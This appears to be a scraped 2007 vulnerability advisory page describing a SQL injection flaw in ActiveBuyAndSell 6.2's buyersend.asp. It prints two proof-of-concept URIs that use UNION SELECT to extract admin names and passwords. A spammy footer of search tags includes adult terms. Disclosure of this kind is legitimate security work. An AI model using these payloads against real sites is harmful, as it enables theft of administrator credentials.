about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability


Title ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
Published 2007-03-23-12:00AM
Updated 2007-03-23-04:23PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  CyberGhost is credited with the discovery of this vulnerability.
Vulnerable  Active Web Softwares ActiveBuyandSell 6.2
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:04:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
port 7.htm linksys WR Tag news for c yahoo fr news for C use exploi drupal www.trish lo626l www.huamei Sex video cccdown.co news for c www.zuliao www.zuliao hi.baidu.c Katrinakai Www.Sex vi Nude girle niceshaper Gulid FtP indiansexp xiexie828. www.zuliao Yabb+se phpBB port postfix 2. maxcpm.inf wwwfashion Reshma sex wwwlalat.x Tagger LE. www.zuliao www.lierm. t415t.html firstnight girlie-fli SEXOOCEAN webplayer sexy video Cina girl sbcnnet.cn cbse resul SEXANIMAL www.lierm. datalife videosex10 www.action i like bug